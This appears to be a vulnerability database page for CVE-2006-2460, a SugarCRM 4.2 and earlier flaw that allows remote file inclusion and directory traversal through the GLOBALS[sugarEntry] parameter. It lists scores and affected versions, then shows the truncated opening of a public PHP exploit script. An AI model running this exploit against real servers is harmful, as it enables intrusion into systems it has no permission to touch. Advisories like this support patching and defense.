6.4
CVSSv2

CVE-2006-2460

Published: 19/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

Sugar Suite Open Source (SugarCRM) 4.2 and previous versions, when register_globals is enabled, does not protect critical variables such as $_GLOBALS and $_SESSION from modification, which allows remote malicious users to conduct attacks such as directory traversal or PHP remote file inclusion, as demonstrated by modifying the GLOBALS[sugarEntry] parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

sugarcrm sugarcrm 3.5

sugarcrm sugarcrm 4.0

sugarcrm sugarcrm 4.1

sugarcrm sugarcrm 4.2

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "Sugar Suite Open Source <= 42 \"OptimisticLock!\" arbitrary remote inclusion exploit\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; echo "this is called the \"five claws of Sun-tzu\"\r\n\r\n"; if ($argc<5) { echo "Usage: php "$argv[0]" ho ...